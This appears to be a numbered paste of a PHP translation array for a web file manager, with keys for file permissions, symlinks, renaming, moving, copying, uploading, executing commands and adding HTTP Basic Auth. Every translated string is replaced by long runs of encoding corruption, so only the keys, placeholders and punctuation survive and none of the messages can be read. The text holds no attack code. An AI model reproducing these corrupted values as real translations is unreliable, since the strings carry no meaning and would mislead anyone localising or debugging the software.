  2312. 'size' => '����¯�¿�½������²����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2313. 'permission' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2314. 'owner' => '����¯�¿�½������¨����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2315. 'group' => '����¯�¿�½������§����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2316. 'other' => '����¯�¿�½������¤����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2317. 'functions' => '����¯�¿�½������¦����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2318.  
  2319. 'read' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2320. 'write' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2321. 'execute' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2322.  
  2323. 'create_symlink' => '����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2324. 'delete' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2325. 'rename' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2326. 'move' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2327. 'copy' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2328. 'edit' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2329. 'download' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2330. 'upload' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2331. 'create' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2332. 'change' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2333. 'save' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2334. 'set' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2335. 'reset' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2336. 'relative' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2337.  
  2338. 'yes' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2339. 'no' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2340. 'back' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2341. 'destination' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2342. 'symlink' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2343. 'no_output' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2344.  
  2345. 'user' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2346. 'password' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2347. 'add' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2348. 'add_basic_auth' => '����¯�¿�½������¤����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ HTTP-Basic-Auth',
  2349.  
  2350. 'uploaded' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2351. 'not_uploaded' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2352. 'already_exists' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2353. 'created' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2354. 'not_created' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2355. 'really_delete' => '����¯�¿�½������¤����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½?',
  2356. 'deleted' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n[%1]",
  2357. 'not_deleted' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n[%1]",
  2358. 'rename_file' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:',
  2359. 'renamed' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%2]".',
  2360. 'not_renamed' => '"[%1] ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%2]".',
  2361. 'move_files' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:',
  2362. 'moved' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\":\n[%1]",
  2363. 'not_moved' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\":\n[%1]",
  2364. 'copy_files' => '����¯�¿�½������«����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:',
  2365. 'copied' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\" :\n[%1]",
  2366. 'not_copied' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\" :\n[%1]",
  2367. 'not_edited' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2368. 'executed' => "\"[%1]\" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n{%2}",
  2369. 'not_executed' => "\"[%1]\" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n{%2}",
  2370. 'saved' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2371. 'not_saved' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
  2372. 'symlinked' => '����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ "[%2]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
